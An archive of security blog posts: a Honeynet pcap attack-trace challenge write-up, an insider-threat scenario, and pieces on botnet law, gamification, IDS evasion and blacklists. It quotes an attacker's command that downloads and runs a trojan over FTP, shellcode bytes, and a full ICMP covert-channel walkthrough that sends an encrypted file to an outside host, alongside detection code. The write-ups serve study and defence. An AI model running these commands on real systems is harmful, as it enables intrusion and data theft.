Author Archives: Luis Rocha

Attack Trace – Honeynet challenges – Part 1

[This one is going to be really hands-on with bits and bytes. Hopefully, it will allow you to reinforce and learn new skills with tshark and other tools. Optimistically, you can use these skills in your day-to-day job when doing intrusion detection and analysis. I learned quite some stuff. If you are willing to devote some extra neurons and practice your intrusion detection and analysis skills, go for it. I ran the analysis on a BackTrack Linux distro.]

Honeynet is a non-profit security research organization dedicated to investigating attacks. This organization has been around for more than one decade. The cool stuff is that they provide Challenges to give you the opportunity to analyze these attacks, practice your skills, learn new tools and share your findings. Honeynet claims that these attacks are from real hacks, which makes it even more fun.

On 18 Jan. 2010 the Honeynet Project released a challenge called “pcap attack trace” with the goal of investigating a network attack. This is the one I will focus on today. The packet capture can be found here. Of course the solutions and write-ups are available, so don’t spoil yourself too much. Question 8 was the most difficult for me and I still need to learn more about the topic.

1. Which systems (i.e. IP addresses) are involved?
Running tshark in quiet mode (-q) and printing the hosts tree statistics (-z ip_hosts,tree) from the pcap file gives you the IP addresses involved.
$tshark -r attack-trace.pcap -q -z ip_hosts,tree

2. What can you find out about the attacking host (e.g., where is it located)?
Other than using whois, you can also use tshark with “-R” to apply display filters like you do in Wireshark (current tshark releases use “-Y” for a single-pass display filter). The “-T fields” option displays only the contents of the selected field, in this case “smb.native_os”, which exists under the SMB protocol and specifies the OS. Then pipe the output into “uniq”.
$tshark -r attack-trace.pcap -R 'ip.src==98.114.205.102' -T fields -e smb.native_os | uniq -c

3. How many TCP sessions are contained in the dump file?
Print the statistics about TCP conversations from the pcap, which show 5 TCP sessions.
$tshark -r attack-trace.pcap -q -z conv,tcp -nn

4. How long did it take to perform the attack?
Tshark with “-t r” prints the elapsed time in seconds relative to the first packet. The last packet will show how long it took: approx. 16s.
$tshark -r attack-trace.pcap -t r | tail -n 1

5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Throughout the analysis you can see that the OS is Windows XP, the service is Microsoft DS and the vulnerability is MS04-11.

7. What specific vulnerability was attacked?
Analyze the pcap file with Snort using default configuration file and log the output in full mode. This will give you good details about it.
$ sudo snort -r attack-trace.pcap -c /etc/snort/snort.conf -l /tmp/ -A full
$ cat /tmp/alert

[**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
04/19-22:28:30.172468 98.114.205.102:1828 -> 192.150.11.111:445
TCP TTL:113 TOS:0x0 ID:15421 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8CFFA9C Ack: 0x5BD511D9 Win: 0xF7D6 TcpLen: 20
[Xref => http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0533][Xref => http://www.securityfocus.com/bid/10108]

8. What actions does the shellcode perform? Pls list the shellcode.
This is the difficult one. I must admit it goes beyond my current skills and will need more time to learn. I needed some help and used the existing write-ups for guidance. Basically, if you look closer at the capture, especially stream 1, some of the packets look suspicious due to the NOP slides (0x90) throughout the packets. These instructions are common in buffer overflow exploits and others. The “-x” option prints the hex and ASCII, and “-V” is for verbose output.
$tshark -r attack-trace.pcap -R 'tcp.stream == 1' -x
$tshark -r attack-trace.pcap -R 'frame.number==29' -xV
(..)
00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0150 90 90 eb 10 5a 4a 33 c9 66 b9 7d 01 80 34 0a 99 ….ZJ3.f.}..4..
(..)

Ok, so we want to extract just the interesting data from frame 29 which represents the shellcode.
$tshark -r attack-trace.pcap -R 'frame.number==29' -T fields -e tcp.data
(..) 90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90 (..)

Now we can try to get more information about it. For example, pipe the extract of “tcp.data” from frame 29 into “sed” to substitute the “:” with “\x”. Then it will be in a format readable by the disassembler ndisasm. ndisasm will disassemble the binary in 32-bit fashion. On the output you can see that the shellcode starts with xor instruction and throughout the list you find that the shellcode is encoded using XOR.

$tshark -r attack-trace.pcap -R 'frame.number==29' -T fields -e tcp.data | sed 's/:/\\x/g' | ndisasm -b 32 -
(..)
00000000 3030 xor [eax],dh
00000002 5C pop esp
00000003 7830 js 0x35
00000005 305C7830 xor [eax+edi*2+0x30],bl
00000009 635C7866 arpl [eax+edi*2+0x66],bx
0000000D 345C xor al,0x5c
(..)

To decode XOR you can do a similar extract, but now pipe the tcp.data into “xxd”. xxd with “-r -p” reverses the hex into binary, reading it as plain (postscript-style) hexdump.
$tshark -r attack-trace.pcap_ -R 'frame.number==29' -T fields -e tcp.data | xxd -r -p | xxd
(..)
0000110: 9090 9090 9090 9090 9090 9090 eb10 5a4a …………..ZJ
0000120: 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb 3.f.}..4……..
0000130: ffff ff70 9598 9999 c3fd 38a9 9999 9912 …p……8…..
(..)

Finally, if you pipe the contents of the binary into the disassembler you will have the shellcode instructions, but now decoded. This was how far I could go with time limitations.
$tshark -r attack-trace.pcap -R 'frame.number==29' -T fields -e tcp.data | xxd -r -p | ndisasm -b 32 -

(..)
0000011C EB10 jmp short 0x12e
0000011E 5A pop edx
0000011F 4A dec edx
00000120 33C9 xor ecx,ecx
00000122 66B97D01 mov cx,0x17d
00000126 80340A99 xor byte [edx+ecx],0x99
(..)
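
The disassembly above is a small decoder stub: it XORs the 0x17d bytes that follow it with the key 0x99 before jumping into them. As an added example (not part of the original post or the challenge write-ups), the following Python locates that stub in a raw byte buffer and removes the XOR layer so the result can be handed to ndisasm; the function names are hypothetical, and the sample buffer is constructed from the bytes visible in the hexdump above, so it is truncated.

```python
import re
import sys

# Decoder stub as it appears in the frame 29 hexdump. The operand of "mov cx"
# and the XOR key are captured, so the same stub with other values also matches.
#   eb 10          jmp short   -> lands on the call below
#   5a             pop edx     ; edx = address of the first encoded byte
#   4a             dec edx
#   33 c9          xor ecx,ecx
#   66 b9 LL LL    mov cx,LEN
#   80 34 0a KK    xor byte [edx+ecx],KEY
#   e2 fa          loop        ; repeats until ecx reaches 0
#   eb 05          jmp short   -> skips the call, into the decoded payload
#   e8 eb ff ff ff call        ; pushes the payload address, jumps to pop edx
STUB = re.compile(
    rb"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9(?P<length>..)"
    rb"\x80\x34\x0a(?P<key>.)\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff",
    re.DOTALL,
)


def sled_length(buf: bytes, end: int) -> int:
    """Count the 0x90 bytes that immediately precede offset `end`."""
    n = 0
    while end - n > 0 and buf[end - n - 1] == 0x90:
        n += 1
    return n


def decode_xor_stub(buf: bytes):
    """Find the stub and XOR-decode the bytes after it; None if no stub."""
    m = STUB.search(buf)
    if m is None:
        return None
    length = int.from_bytes(m.group("length"), "little")
    key = m.group("key")[0]
    # edx+ecx walks from the last encoded byte down to the first one, so the
    # stub decodes exactly `length` bytes starting right after the call.
    encoded = buf[m.end():m.end() + length]
    return {
        "stub_offset": m.start(),
        "nop_sled": sled_length(buf, m.start()),
        "key": key,
        "declared_length": length,
        "truncated": len(encoded) < length,  # capture ended before LEN bytes
        "decoded": bytes(b ^ key for b in encoded),
    }


# Constructed sample: a short NOP run, the stub bytes and the first 13 encoded
# bytes exactly as they appear in the xxd output above (the rest is elided).
FRAME29_SAMPLE = (
    b"\x90" * 16
    + bytes.fromhex("eb105a4a33c966b97d0180340a99e2faeb05e8ebffffff")
    + bytes.fromhex("7095989999c3fd38a999999912")
)

if __name__ == "__main__":
    # With a file argument, decode the binary written by "xxd -r -p".
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else FRAME29_SAMPLE
    result = decode_xor_stub(data)
    if result is None:
        print("decoder stub not found")
    else:
        print("key=0x%02x length=0x%x sled=%d truncated=%s" % (
            result["key"], result["declared_length"],
            result["nop_sled"], result["truncated"]))
        print(result["decoded"].hex())
```

Writing the decoded bytes to a file and running ndisasm -b 32 on it gives the instructions the stub hides from a plain disassembly of the frame.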

9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
If you run passive fingerprinting analysis on the pcap, it will tell you that the victim is running Linux; however, it has a Microsoft vulnerability. We can assume that it’s a honeypot.

$ sudo p0f -s attack-trace.pcap 'src 192.150.11.111'
p0f – passive os fingerprinting utility, version 2.0.8
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN) on ‘attack-trace.pcap_’, 262 sigs (14 generic, cksum 0F1F5CA2), rule: ‘src 192.150.11.111’.
192.150.11.111:36296 – Linux 2.6 (newer, 3) (up: 11265 hrs)
-> 98.114.205.102:8884 (distance 0, link: ethernet/modem)
[+] End of input file.

10. Was there malware involved? What’s the name of the malware? (We are not looking for a detailed malware analysis for this challenge).
There is an extra file downloaded using FTP after the compromise of the system. You can see details about it in streams 2 and 3.

$tshark -r attack-trace.pcap -R 'tcp.stream==2' -T fields -e data.text

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe\x0d\x0a
ssms.exe\x0d\x0a

$ tshark -r attack-trace.pcap -R 'tcp.stream==3' -T fields -e data.text

220 NzmxFtpd 0wns j0\x0a
USER 1\x0d\x0a
331 Password required\x0a
PASS 1\x0d\x0a
230 User logged in.\x0a
SYST\x0d\x0a
215 NzmxFtpd\x0a
TYPE I\x0d\x0a
200 Type set to I.\x0a
PORT 192,150,11,111,4,56\x0d\x0a
200 PORT command successful.\x0a
RETR ssms.exe\x0d\x0a
150 Opening BINARY mode data connection\x0a
QUIT\x0d\x0a
226 Transfer complete.\x0a
221 Goodbye happy r00ting.\x0a

Other than that, on stream 4 there is a Windows executable that is easily identified by its file signature (magic number), which contains the “MZ” string. There are a variety of tools to extract and carve files from pcap files. I used “foremost” to extract it.

$ foremost -i attack-trace.pcap
Processing: attack-trace.pcap
|*|

$ ls output/exe/
00000021.exe
$ file output/exe/00000021.exe
output/exe/00000021.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Finally, you can install ClamAV (Sourcefire open source AV) on your system and scan the executable file.

$ sudo apt-get install clamav clamav-freshclam
$ clamscan output/exe/00000021.exe
00000021.exe: Trojan.SdBot-9861 FOUND.


Countermeasures against Botnets – Legal aspects

The NATO Cooperative Cyber Defense Centre of Excellence, based in Tallinn, Estonia, just released a study about the legal implications of passive and active countermeasures against botnets. This investigation was made in collaboration with the European Network and Information Security Agency (ENISA). It covers the legal aspects of fighting against botnets, taking into account German and Estonian law. The study was created by two legal experts, one attorney, two scientists and a post-graduate civil service trainee. It’s very well written and it uses an interdisciplinary language, which makes it accessible to people who aren’t specialists in information technology or law.

It covers a variety of interesting topics, such as what to do when you assume a system is compromised by a botnet. One of the steps, as part of the incident handling process, is that you might capture and inspect the traffic in order to detect and analyze the botnet traffic. However, from a legal perspective the study presents a variety of legal concerns regarding this. Some of them are personal data protection, unauthorized surveillance and confidentiality of communications. It means such monitoring might be perceived as a breach of criminal law. Even if some of the laws were not written in light of cyberspace, they can still apply.

Another topic with very unique characteristics and legal concerns is running a honeypot to collect, store and process data to learn about botnets. What are the legal concerns about sharing the data gained from running the honeypot? Or how challenging can it be for a private researcher to prove that the data he is collecting is for scientific interests? These and other legal concerns are discussed in the study.

How about the takeover of botnets, which assumes you have successfully infiltrated the CnC server? If the botnet is taken over with the intent to eliminate and prevent crime and not to prepare one, it still has implications under criminal law. Given the uncertainty of jurisdictional traits on how to handle such situations, there is the risk of someone making themselves susceptible to prosecution. Other topics include: Takedown of Command and Control Servers, Automated Immunization or Disinfection, Botnet Mitigation Techniques under Exceptional Circumstances, Duty to Act against Botnet Attacks and Liability of Owners of Infected Hosts.

Apart from that, throughout the study there are excellent references that provide supporting and corroborating evidence for its assertions. Definitely a must-read for security professionals involved in incident handling and others.


Insider Threat – Dee Cypher

In my previous post I wrote about gamification and how it can be used to learn security skills. Let’s further illustrate this with a challenge that represents the risks of insider threats: exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E., found that ACME is working on a new high-profile deal. Justin Case wants to get his hands on that information to sell it to the competitors. He just contacted another operative from V.I.L.E., Dee Cypher, who has insider access to ACME. His mission is to smuggle confidential information past the high-end security controls in place, like firewalls and Data Loss Prevention. At a secret venue they shared some information: ACME is running the latest version of Checkpoint Firewall with rigid rules; however, it allows ping requests to be made, with a maximum ping size protection of 1400 bytes. Also, to bypass DLP inspection they agreed that the information should be sent encrypted using symmetric encryption, AES 256 bits, with a shared secret that they agreed upon.

How can Dee Cypher and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls -lrta
-rw-r--r-- 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo 'scale=2;30800/1400' | bc -q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 220.132.33.16 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R 'icmp.type==8' -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Let’s describe the commands of Dee Cypher. First, the md5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using the AES-256-CBC algorithm, resulting in SecretPlans.enc. Then, SecretPlans.enc was checked and it contains 30800 bytes. Now he wanted to know how many ICMP packets he will need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode and divided the file size by the size of the payload. The result, formatted to show two digits after the decimal point, is 22. It means he will need to send 22 packets to send the whole contents of the file. To forge the ICMP packets hping3 was used. The command specifies the filename that will fill the packet data, the traffic type using ICMP mode with a data size of 1400, and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. Using tshark, he extracted the traffic that matched the Wireshark filter for ICMP Echo Request (type 8) and wrote it into data.pcap. Then he extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the data into binary using plain hexdump style. The file was decrypted using the same algorithm, and finally integrity was checked and the file was opened with Acrobat Reader.

Note: In this example a Checkpoint R75 with the IPS and DLP blades enabled was used. The IPS was configured with a Max Ping Size of 1400 bytes. By default the IPS does not have the Max Ping Size protection enabled and the default value is 2500 bytes. Further, the ICMP traffic is not covered by DLP inspection, which means the data could be sent in clear text instead of encrypted.

After having fun, and hopefully engaging people to challenge this with other possibilities and tools, let’s think about it. This example demonstrates that insider threat should be a serious concern for today’s organizations. In this case intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in order to develop controls to detect, remediate and mitigate. Access to information outside of need to know, unauthorized encryption of information and unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for a possible detection.
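
One way to turn the “unauthorized information transfer” observable into a check, as an added example that is not part of the original post: the Python below flags flows of ICMP echo requests whose payloads are both larger than an ordinary ping and look like ciphertext (high byte entropy). The thresholds, function names and the packets (documentation addresses, SHA-256 output standing in for the encrypted file) are assumptions constructed for the illustration.

```python
import hashlib
import math
import socket
import struct
from collections import Counter

ICMP_PROTO = 1
ECHO_REQUEST = 8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_echo_request(packet: bytes):
    """Return (src, dst, payload) for an IPv4 ICMP echo request, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != ICMP_PROTO or len(packet) < ihl + 8:
        return None
    if packet[ihl] != ECHO_REQUEST:
        return None
    return (socket.inet_ntoa(packet[12:16]),
            socket.inet_ntoa(packet[16:20]),
            packet[ihl + 8:])


def find_icmp_exfil(packets, max_payload=64, min_entropy=7.0, min_packets=3):
    """Group suspicious echo requests by (src, dst) and report busy flows.

    Thresholds are assumptions: ordinary pings carry 32-56 patterned bytes,
    so a payload must be both large and high-entropy to count.
    """
    flows = {}
    for pkt in packets:
        parsed = parse_echo_request(pkt)
        if parsed is None:
            continue
        src, dst, payload = parsed
        if len(payload) <= max_payload or shannon_entropy(payload) < min_entropy:
            continue
        stats = flows.setdefault((src, dst), {"packets": 0, "bytes": 0})
        stats["packets"] += 1
        stats["bytes"] += len(payload)
    return {k: v for k, v in flows.items() if v["packets"] >= min_packets}


def build_echo(src, dst, seq, payload):
    """Build a constructed IPv4 + ICMP echo request (checksums left at 0)."""
    icmp = struct.pack("!BBHHH", ECHO_REQUEST, 0, 0, 0x1234, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), seq, 0, 64,
                     ICMP_PROTO, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return ip + icmp


def ciphertext_like(n, seed=b"constructed"):
    """Deterministic high-entropy bytes standing in for an encrypted file."""
    out, i = b"", 0
    while len(out) < n:
        out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
        i += 1
    return out[:n]


# Constructed traffic: 22 x 1400-byte encrypted chunks (30800 bytes, as in the
# scenario), four ordinary pings, and three large but low-entropy pings.
_blob = ciphertext_like(30800)
SAMPLE_PACKETS = (
    [build_echo("192.0.2.10", "198.51.100.7", i, _blob[i * 1400:(i + 1) * 1400])
     for i in range(22)]
    + [build_echo("192.0.2.20", "198.51.100.9", i, bytes(range(56))) for i in range(4)]
    + [build_echo("192.0.2.30", "198.51.100.9", i, b"A" * 1400) for i in range(3)]
)

if __name__ == "__main__":
    for (src, dst), stats in find_icmp_exfil(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}: {stats['packets']} packets, {stats['bytes']} bytes")
```

Because the note above says the data could also be sent in clear text, a size-and-volume rule without the entropy condition is the stricter variant of the same check.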

In 2006, the CERT Coordination Center, which is located at Carnegie Mellon University, released a technical report, “Comparing Insider IT Sabotage and Espionage: A model-based analysis”. This study considered not only the technical factors that contribute to espionage and sabotage cases but also the psychological, organizational and contextual factors. It’s definitely a good read for security professionals and leaders with responsibility for the organization’s security posture. Other than that, the CERT Insider Threat Center provides comprehensive and detailed information about this topic.


Gamification

[Image: NetWars logo, used with permission from SANS]

User engagement, return on investment and learning. Those are key benefits of gamification. Gamification might be a new term but it has been used in specific industries for years. One example is the military, which has been using games, challenges and simulations to resolve problems and engage audiences. NATO is considering gamification using the Internet. The Office of Naval Research, a department of the US Navy, recently ran a Massive Multiplayer Online Wargame Leveraging the Internet. Deloitte calls it the engagement economy.

Gabe Zichermann and Christopher Cunningham, in the preface of their latest book, wrote that “Simulation and gaming is a promising, and rapidly-expanding, field of study. This new methodology is being adopted in a wide variety of disciplines. Complicated computer models have helped inform everything from finance to engineering, a new wave of “serious games” have begun to change the way we think about gaming as a tool for learning, and true-to-life simulations have changed the way professionals train for intensive, on the job-skills.”

Then, how can we use and apply gamification to information security? Well, learning information security skills through gamification is what this post is about, and this is where NetWars comes in. NetWars is a product from SANS and it illustrates how gamification can be used to help you increase your information security skills. The concept is not new and there are others. Similar are the Overthewire and Smashthestack challenges, which are also known as capture the flag or wargames. However, NetWars was made by Ed Skoudis. That alone is already a differentiator. Last year in London, SANS hosted the first EMEA NetWars tournament session. It consisted of 5 levels, where each one consists of several challenges that will give you points from 1 to 15 based on their difficulty. To be able to pass to the next level you need to reach a certain threshold. The levels are designed to help participants develop skills in areas such as Vulnerability Assessments, System Hardening, Malware Analysis, Digital Forensics, Incident Response, Packet Analysis and Penetration Testing.

Should business leaders invest in this type of simulation to train their employees? Absolutely, the marriage between pedagogy and technology is a fact. In addition, from a pure return on investment perspective, employee training might be the best business expense. According to Professor Bartel, who is the Director of Columbia Business School’s Workforce Transformation Initiative and an expert in the field of labor economics and human resource management, the estimated return on employee training ranges from 7% to 50% per dollar spent, and in two specific case studies it can grow to returns of 100% to 200% on investment. Further details are in her paper “Measuring Employer Return on Investments in Training”.

To give you an example of how gamification can be used to engage people and learn: you might remember that, back in the 90s, there was a famous video game called Where in the World is Carmen Sandiego?. The game challenges the player to track the thief who is hiding out in one of 30 cities using a world almanac as an investigative tool (for example, “What country uses kroner as its currency?” Check your connections to find out which cities the thief might have fled to). The game basically teaches you knowledge of world geography and cultures.

But back to NetWars and its director, Ed Skoudis: check his presentation on “Using InfoSec Challenges to build your skills and career”. Among other things, the presentation describes the benefits of gamified information security challenges. The presentation also provides guidelines on how to develop your own challenges and simulations.

Teaching and training systems like NetWars are designed to mimic real-life situations. In this case it represents real-world security issues with their respective flaws and resolutions in an interactive and hands-on laboratory environment. Historically, books contain theories and examples. But with simulations, challenges and games, the dynamic and a temporal element can be added. It will also allow difficult concepts to be vibrantly illustrated.

References:
Zichermann, Gabe; Cunningham, Christopher (2011) : Gamification by Design : O’Reilly
Information Resources Management Associations (2011) :Gaming and Simulations : IGI Global


Evader

Evader is a tool produced by Stonesoft which provides a ready-made test lab to test IP evasion techniques. Stonesoft claims that this tool should be used to test the effectiveness of your network security solutions in protecting against and detecting threats. Marketing and hype aside, Stonesoft has always provided innovative solutions in the network security market. You might remember the old days of the Stonebeat Full Cluster software that was used by vendors like Checkpoint to create high availability and load sharing scenarios.

The evader tool has the ability to test IP evasion techniques against two vulnerabilities: CVE-2004-1315 and CVE-2008-4250. For the first one, the tool has 24 evasion methods available, of which 9 are at the application layer, 2 at the network layer and 13 at the transport layer. The test lab covers CVE-2004-1315 and it can be easily downloaded and deployed using VMware. The documentation is clear and provides step-by-step guidance.

Essentially, the virtual machine contains an installed Linux, Apache, MySQL and PHP stack with the PHP Bulletin Board version 2.0.10 deployed. This application is vulnerable to CVE-2004-1315. The Santy worm back in 2004 used this vulnerability to abuse and deface websites.

In the tested version of evader the available evasion techniques are:

http_header_lws – HTTP header linear whitespace
http_known_user_agent – HTTP known user agent
http_request_line_separator – HTTP request line separator
http_request_method – HTTP request method
http_request_pipelined – HTTP request pipelined
http_url_absolute – HTTP URL absolute
http_url_dummypath – HTTP dummy paths
http_url_encoding – HTTP URL encoding
http_version – HTTP request version
ipv4_frag – IPv4 fragmentation
ipv4_opt – IPv4 options
tcp_chaff – TCP Chaff
tcp_initialseq – TCP initial sequence number
tcp_inittsopt – TCP timestamp option settings
tcp_nocwnd – Disable TCP congestion avoidance
tcp_nofastretrans – Disable TCP fast retransmit
tcp_order – TCP segment order
tcp_overlap – TCP segment overlap
tcp_paws – TCP PAWS elimination
tcp_recv_window – TCP receive window
tcp_seg – TCP segmentation
tcp_timewait – TCP TIME-WAIT decoys
tcp_tsoptreply – TCP timestamp echo reply modifications
tcp_urgent – TCP urgent data

I decided to take a deeper look and downloaded evader version 0.9.8.557. After that I created a small lab to test the tool against the Checkpoint product with the Firewall and IPS blades enabled. Mainly, I created an account on the Checkpoint User Center, requested a 15-day trial license and downloaded the ISO image of Checkpoint R75.40 with software blades. I installed the system as Security Gateway and Security Management Server and configured IP addressing, rules and routing to suit the test scenario. The lab setup won’t take long if you are familiar with VMware and Checkpoint.

Interestingly, neither the default nor the recommended IPS profile from Checkpoint R75.40 catches the attack used against CVE-2004-1315. I used evader and Metasploit. Looking deeper at the signatures from Checkpoint Web Intelligence – Malicious codes – General HTTP worm catchers, the signature that eventually should catch this attack is called Sanity.A Worm. However, the regular expression available for this attack needs to be adjusted. After that the attack is successfully detected and/or prevented. From the moment that the security solution detects the attack we can start using the evasion techniques to test its effectiveness. In this case, after having the signature configured properly on the Checkpoint IPS, the evasion techniques I tried (time limitation was a factor) were all detected/prevented. With an overall protection score of 98.3% in the NSS Labs report, that would be the expected result.

Understanding threats, identifying their causes and implementing effective countermeasures takes time but will help you reduce risk and exposure. By this I mean that it’s generally worth doing your own assessment and using this kind of tool against the security products that protect your assets, to have a better understanding of their technical advantages and drawbacks. Security companies want to make you think you are as secure as possible, and that eventually gives you a false sense of security.

If you are interested in intrusion analysis and/or configuring IDS/IPS systems, or if you would like to have a peek behind the scenes at how packets look when crafted with evasion techniques such as fragmentation attacks or obfuscation, then evader is definitely a good start. The tool illustrates quite well a significant number of attack vectors. You can use it to complement frameworks like Metasploit to learn or reinforce skills about evasion techniques.

[2017-02-10]: The Evader tool is no longer available but I kept a copy here: Evader, for the ones that are interested in playing with it.

In addition to this write-up, the following references will give you all you need to acquire more knowledge about Intrusion Detection Evasion:

Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection
Ptacek & Newsham, 1998

The Base-Rate Fallacy and its Implications for the Difficulty of Intrusion Detection
Stefan Axelsson, 1999

A Strict Anomoly Detection Model for IDS
sasha / beetle, 2000

Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics
Handley & Paxton, 2001

IDS Evasion Techniques and Tactics
Kevin Timm, 2002

Combining Evasion Techniques to Avoid Network Intrusion Detection Systems
Gorton & Champion, 2003

Intrusion Detection System (IDS) Evasion
VeriSign, 2006

Thermoptic Camouflage: Total IDS Evasion
Caswell & Moore, 2006

Metasploitation
HD Moore, CanSecWest 2006

How to test an IPS
Renaud Bidou, 2006

Detection of DDoS and IDS Evasion Attacks in a High-Speed Networks Environment
Oh, Park Jang & Jeon, 2007

Advanced Evasion Techniques: New Methods and Combinatorics for Bypassing Intrusion Prevention Technologies
Boltz Jalava & Walsh, 2010

Active Mapping : Resisting NIDS Evasion without Altering Traffic
Umesh Shankar, Vern Paxson

Intrusion Detection FAQ: How does Fragroute evade NIDS detection?
Michael Holstein


Overlapping IPv6 Fragments

Antonios Atlasis is an independent IT security analyst who just recently joined the Centre for Strategic Cyberspace + Security Science non-profit organization. This year he released a paper called “Attacking IPv6 Implementation Using Fragmentation”. If you are interested in the security issues that arise from IP packet fragmentation then you should read it. It describes how fragmentation can be used by attackers to elude intrusion detection systems. It also includes PoCs produced with the Scapy tool. Eventually, one of the results of this research is the fresh CVE-2012-4444.

It is worth noting that the IETF released a standard, RFC 5722, about this topic back in December 2009. In this RFC, Suresh Krishnan from the IPv6 working group clearly states that the IPv6 specification should prevent overlapping fragments. We should clearly see adoption of this RFC by the security industry in the future.

Attacks via IP packet fragmentation are not new, and they were very well documented in January 1998 by Thomas Ptacek and Timothy Newsham in the landmark paper on this topic called “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”. Based on this paper, Dug Song released a tool called fragrouter and later fragroute, which implemented the techniques described in that paper. But that’s a different story, and it’s my intention to write more about this topic in the near future because it’s still being discussed today.


Start with 334

Effective and reliable security monitoring that produces actionable information is one of the tools that can help us adjust to today’s complex threat landscape. One of the existing mechanisms under security monitoring is the use of real-time blacklists (RBLs). These blacklists keep track of IP addresses that are considered malicious or offensive and help people and organizations keep track of IP addresses that they own. For example, you can monitor and potentially detect if your public IP address space is being blacklisted, or if one of your systems has been compromised and is communicating with a blacklisted IP (e.g. sending intellectual property overseas or receiving command and control commands with malevolent instructions).

The information available is mainly public and is a contribution of well-known individuals, like Roman Hussy from Abuse.ch or Steven Adair from the Shadowserver Foundation, to the security community. I have reasons to believe that when combining information from reliable and trustworthy blacklist data sources with the defense mechanisms in place (traditionally blacklists are used at the perimeter due to the volume of data) we have a straightforward method which will accurately identify signs of danger, reduce our exposure to today’s threats and provide actionable intelligence.

Of the available blacklist data sources, three are worth remarking on (descriptions taken from their respective websites):

Abuse.ch is one of the best public resources that you can use to track botnet command and control domains and IP addresses. At the moment it contains three trackers:

  1. Zeus tracker is a list of all ZeuS C&Cs as well as Fake URLs which are currently known to the ZeuS Tracker. You can browse the ZeuS Tracker to get a list of ZeuS C&Cs and FakeURLs in a specified Country or AS number. Additionally the ZeuS Tracker provides a feature which allows to filter the ZeuS C&Cs for specified Nameservers, Level, Status and many more.
  2. SpyEye Tracker is another project by abuse.ch. It is similar to the ZeuS Tracker with the slight difference that SpyEye Tracker tracks and monitors malicious SpyEye Command&Control Servers (and not ZeuS C&Cs). SpyEye Tracker provides blocklists in different formats (eg. for Squid Web-Proxy or iptables) to avoid that infected clients can access the C&C servers. Additionally, SpyEye Tracker should help ISPs, CERTs and Law Enforcement to track malicious SpyEye C&C servers which are their responsibility
  3. Palevo tracker is a list of Palevo infections. Palevo is a worm that spreads using instant messaging, P2P networks and removable drives (like USB sticks). It is being sold in underground forums like ZeuS. The worm (also known as Rimecud, Butterfly bot and Pilleuz) made big press in 2010 (see Trend Micro: “Clipping Mariposa’s Wings” / Symantec: “Symantec: The Mariposa Butterfly“).

Shadowserver Foundation is an all volunteer watchdog group of security professionals that gather, track, and report on malware, botnet activity, and electronic fraud. It is the mission of the Shadowserver Foundation to improve the security of the Internet by raising awareness of the presence of compromised servers, malicious attackers, and the spread of malware. You might have heard about them from their collaboration with Microsoft on taking down the Waledac botnet.

